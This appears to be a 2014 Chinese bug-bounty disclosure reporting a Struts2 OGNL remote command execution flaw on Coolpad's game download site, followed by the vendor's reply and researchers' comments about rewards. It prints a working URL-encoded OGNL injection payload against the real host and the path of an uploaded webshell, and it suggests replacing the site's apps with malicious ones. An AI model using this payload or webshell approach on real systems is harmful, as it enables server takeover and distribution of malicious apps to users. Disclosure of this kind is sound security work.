酷派酷游宝贝远程命令执行漏洞可劫持APP

酷派酷游宝贝远程命令执行漏洞可劫持APP

http://game.coolpad.com/gameDetail_YxDetailAction.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

成功获取WEBSHELL

http://game.coolpad.com/css.jsp

该站还有运维管理无验证

http://game.coolpad.com/adWallAPI/test.jsp

该站是APP下载网站，入侵后可替换原来网站正常的APP程序，换成恶意程序。然后你懂得。

求礼物~~~我的奖励呢？？？

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-07-15 16:27

厂商回复：

感谢提交，我们会尽快修复，礼物稍后奉上。

最新状态：

暂无

1. 2014-07-14 21:02 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

   0

   我之前不是提交了么。。。为毛他们还没修复？？

   1# 回复此人

2. 2014-07-14 21:03 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

   0

   这坑爹的。。。我试了一下。。果然还存在。。

   2# 回复此人

3. 2014-07-14 21:07 | j2ck3r ( 普通白帽子 | Rank:428 漏洞数:100 | 别关注我，跟你不熟。)

   0

   @mango 哈哈 我 在搞一次 这洞子 很早我就发现了。但是你先提交了

   3# 回复此人

4. 2014-07-14 21:08 | j2ck3r ( 普通白帽子 | Rank:428 漏洞数:100 | 别关注我，跟你不熟。)

   0

   @mango Z这厂商有礼物还没给我。提醒下

   4# 回复此人

5. 2014-07-14 22:13 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

   0

   @j2ck3r 别指望了 - - 这厂商连洞都不补。。。还给你发毛线礼物·

   5# 回复此人

6. 2014-08-04 16:33 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

   0

   礼物发了么

   6# 回复此人